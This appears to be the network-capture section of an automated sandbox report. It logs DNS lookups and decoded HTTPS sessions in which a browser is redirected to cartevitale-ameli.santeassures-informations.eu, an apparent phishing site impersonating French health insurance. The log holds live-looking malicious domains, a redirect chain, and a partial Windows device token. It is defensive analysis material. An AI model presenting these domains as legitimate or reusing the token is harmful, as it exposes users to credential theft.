                        Jul 3, 2024 14:39:27.295779943 CEST53587441.1.1.1192.168.2.6
                        Jul 3, 2024 14:39:40.342950106 CEST53531371.1.1.1192.168.2.6
                        Jul 3, 2024 14:40:01.521934032 CEST53500501.1.1.1192.168.2.6
                        Jul 3, 2024 14:40:03.124162912 CEST53627811.1.1.1192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 3, 2024 14:39:03.929197073 CEST192.168.2.61.1.1.10x80d6Standard query (0)inpzk.useringimportdulcimer.inkA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:03.929506063 CEST192.168.2.61.1.1.10xef21Standard query (0)inpzk.useringimportdulcimer.ink65IN (0x0001)false
                        Jul 3, 2024 14:39:04.554872990 CEST192.168.2.61.1.1.10xee4bStandard query (0)cartevitale-ameli.santeassures-informations.euA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:04.555092096 CEST192.168.2.61.1.1.10xd7f5Standard query (0)cartevitale-ameli.santeassures-informations.eu65IN (0x0001)false
                        Jul 3, 2024 14:39:06.213712931 CEST192.168.2.61.1.1.10xceeeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:06.214382887 CEST192.168.2.61.1.1.10x68f9Standard query (0)www.google.com65IN (0x0001)false
                        Jul 3, 2024 14:39:09.936923027 CEST192.168.2.61.1.1.10xbecaStandard query (0)cartevitale-ameli.santeassures-informations.euA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:09.937375069 CEST192.168.2.61.1.1.10x4262Standard query (0)cartevitale-ameli.santeassures-informations.eu65IN (0x0001)false
                        Jul 3, 2024 14:39:10.788654089 CEST192.168.2.61.1.1.10xe075Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:10.788829088 CEST192.168.2.61.1.1.10x21ccStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                        Jul 3, 2024 14:39:12.275263071 CEST192.168.2.61.1.1.10xdd55Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:12.275875092 CEST192.168.2.61.1.1.10xa20cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                        Jul 3, 2024 14:39:13.712188959 CEST192.168.2.61.1.1.10x3ac9Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:13.712188959 CEST192.168.2.61.1.1.10xbde5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                        Jul 3, 2024 14:39:13.955188990 CEST192.168.2.61.1.1.10x9fe4Standard query (0)cartevitale-ameli.santeassures-informations.euA (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:13.955502033 CEST192.168.2.61.1.1.10x68e4Standard query (0)cartevitale-ameli.santeassures-informations.eu28IN (0x0001)false
                        Jul 3, 2024 14:39:14.679567099 CEST192.168.2.61.1.1.10xd075Standard query (0)cartevitale-ameli.santeassures-informations.eu28IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 3, 2024 14:39:03.945728064 CEST1.1.1.1192.168.2.60xef21No error (0)inpzk.useringimportdulcimer.ink65IN (0x0001)false
                        Jul 3, 2024 14:39:03.945952892 CEST1.1.1.1192.168.2.60x80d6No error (0)inpzk.useringimportdulcimer.ink188.114.96.3A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:03.945952892 CEST1.1.1.1192.168.2.60x80d6No error (0)inpzk.useringimportdulcimer.ink188.114.97.3A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:05.299428940 CEST1.1.1.1192.168.2.60xd7f5No error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:05.311568975 CEST1.1.1.1192.168.2.60xee4bNo error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:05.311568975 CEST1.1.1.1192.168.2.60xee4bNo error (0)megatasklines.freemyip.com102.48.55.178A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:06.222037077 CEST1.1.1.1192.168.2.60x68f9No error (0)www.google.com65IN (0x0001)false
                        Jul 3, 2024 14:39:06.223252058 CEST1.1.1.1192.168.2.60xceeeNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:10.660893917 CEST1.1.1.1192.168.2.60xbecaNo error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:10.660893917 CEST1.1.1.1192.168.2.60xbecaNo error (0)megatasklines.freemyip.com102.48.55.178A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:10.673886061 CEST1.1.1.1192.168.2.60x4262No error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:10.795547009 CEST1.1.1.1192.168.2.60xe075No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:10.795547009 CEST1.1.1.1192.168.2.60xe075No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:10.797036886 CEST1.1.1.1192.168.2.60x21ccNo error (0)challenges.cloudflare.com65IN (0x0001)false
                        Jul 3, 2024 14:39:12.283842087 CEST1.1.1.1192.168.2.60xdd55No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:12.283842087 CEST1.1.1.1192.168.2.60xdd55No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:12.283857107 CEST1.1.1.1192.168.2.60xa20cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                        Jul 3, 2024 14:39:13.719536066 CEST1.1.1.1192.168.2.60x3ac9No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:13.719536066 CEST1.1.1.1192.168.2.60x3ac9No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:13.722379923 CEST1.1.1.1192.168.2.60xbde5No error (0)challenges.cloudflare.com65IN (0x0001)false
                        Jul 3, 2024 14:39:14.668899059 CEST1.1.1.1192.168.2.60x68e4No error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:14.684743881 CEST1.1.1.1192.168.2.60x9fe4No error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:14.684743881 CEST1.1.1.1192.168.2.60x9fe4No error (0)megatasklines.freemyip.com102.48.55.178A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:15.395940065 CEST1.1.1.1192.168.2.60xd075No error (0)cartevitale-ameli.santeassures-informations.eumegatasklines.freemyip.comCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:20.672233105 CEST1.1.1.1192.168.2.60xc3ffNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Jul 3, 2024 14:39:20.672233105 CEST1.1.1.1192.168.2.60xc3ffNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:24.927985907 CEST1.1.1.1192.168.2.60x61c6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:24.927985907 CEST1.1.1.1192.168.2.60x61c6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:55.427118063 CEST1.1.1.1192.168.2.60x6000No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:39:55.427118063 CEST1.1.1.1192.168.2.60x6000No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:40:23.767400026 CEST1.1.1.1192.168.2.60xdfe6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Jul 3, 2024 14:40:23.767400026 CEST1.1.1.1192.168.2.60xdfe6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                        • inpzk.useringimportdulcimer.ink
                        • cartevitale-ameli.santeassures-informations.eu
                        • https:
                          • challenges.cloudflare.com
                        • fs.microsoft.com
                        Session IDSource IPSource PortDestination IPDestination Port
                        0192.168.2.64970940.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:38:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 5a 77 4a 57 6a 45 62 47 6b 36 6d 75 51 6d 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 30 32 61 34 37 66 65 32 62 61 33 37 31 64 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: 5ZwJWjEbGk6muQmG.1Context: d102a47fe2ba371d
                        2024-07-03 12:38:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:38:53 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 35 5a 77 4a 57 6a 45 62 47 6b 36 6d 75 51 6d 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 30 32 61 34 37 66 65 32 62 61 33 37 31 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 5ZwJWjEbGk6muQmG.2Context: d102a47fe2ba371d<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:38:53 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 5a 77 4a 57 6a 45 62 47 6b 36 6d 75 51 6d 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 30 32 61 34 37 66 65 32 62 61 33 37 31 64 0d 0a 0d 0a
                        Data Ascii: BND 3 CON\QOS 56MS-CV: 5ZwJWjEbGk6muQmG.3Context: d102a47fe2ba371d
                        2024-07-03 12:38:53 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:38:53 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 4b 50 55 74 67 48 77 48 30 32 4a 53 68 48 47 78 4b 37 30 4d 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: JKPUtgHwH02JShHGxK70MQ.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        1192.168.2.64971040.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6d 31 64 30 4b 4b 59 46 41 55 53 44 5a 64 59 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 64 62 66 66 65 32 64 38 62 33 34 33 38 36 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: m1d0KKYFAUSDZdYn.1Context: 3ddbffe2d8b34386
                        2024-07-03 12:39:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:01 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 6d 31 64 30 4b 4b 59 46 41 55 53 44 5a 64 59 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 64 62 66 66 65 32 64 38 62 33 34 33 38 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: m1d0KKYFAUSDZdYn.2Context: 3ddbffe2d8b34386<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:01 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 6d 31 64 30 4b 4b 59 46 41 55 53 44 5a 64 59 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 64 62 66 66 65 32 64 38 62 33 34 33 38 36 0d 0a 0d 0a
                        Data Ascii: BND 3 CON\QOS 56MS-CV: m1d0KKYFAUSDZdYn.3Context: 3ddbffe2d8b34386
                        2024-07-03 12:39:01 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:01 UTC58INData Raw: 4d 53 2d 43 56 3a 20 64 65 62 2b 67 33 5a 72 48 55 79 69 70 76 44 38 32 5a 4f 7a 32 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: deb+g3ZrHUyipvD82ZOz2w.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.649718188.114.96.34434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:04 UTC690OUTGET /?=vxkncwole9 HTTP/1.1
                        Host: inpzk.useringimportdulcimer.ink
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-User: ?1
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:04 UTC697INHTTP/1.1 301 Moved Permanently
                        Date: Wed, 03 Jul 2024 12:39:04 GMT
                        Content-Type: text/html
                        Content-Length: 167
                        Connection: close
                        Cache-Control: max-age=3600
                        Expires: Wed, 03 Jul 2024 13:39:04 GMT
                        Location: https://cartevitale-ameli.santeassures-informations.eu/assurance/index.html
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqkvvnnla9FkibZONdMAGpClKaF3xdvpob%2FLOKNgng2mSbY8NqO3YK1WhuHGjQhi8K1QFPMAJvj%2Fd2I2ExaJFLawsFjzXXEsh2f73hMzdpSFjHz8uvUZYs7j%2FDB6qAM8ru2eV0US7kUxwoaaJ2LuRPuEBXmUig%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 89d6efad18047cb4-EWR
                        2024-07-03 12:39:04 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination Port
                        3192.168.2.64971640.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:04 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 72 6f 38 31 51 4f 38 71 51 30 36 64 73 2b 35 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 66 39 65 62 32 65 66 63 36 35 36 31 65 65 37 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: ro81QO8qQ06ds+5z.1Context: 3f9eb2efc6561ee7
                        2024-07-03 12:39:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:04 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 72 6f 38 31 51 4f 38 71 51 30 36 64 73 2b 35 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 66 39 65 62 32 65 66 63 36 35 36 31 65 65 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: ro81QO8qQ06ds+5z.2Context: 3f9eb2efc6561ee7<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:04 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 72 6f 38 31 51 4f 38 71 51 30 36 64 73 2b 35 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 66 39 65 62 32 65 66 63 36 35 36 31 65 65 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: ro81QO8qQ06ds+5z.3Context: 3f9eb2efc6561ee7<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2024-07-03 12:39:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 61 63 44 38 52 63 48 43 38 55 61 4b 34 59 48 4d 79 53 57 5a 72 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: acD8RcHC8UaK4YHMySWZrw.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.649721102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:06 UTC709OUTGET /assurance/index.html HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-User: ?1
                        Sec-Fetch-Dest: document
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:06 UTC377INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 255
                        Connection: close
                        Set-Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
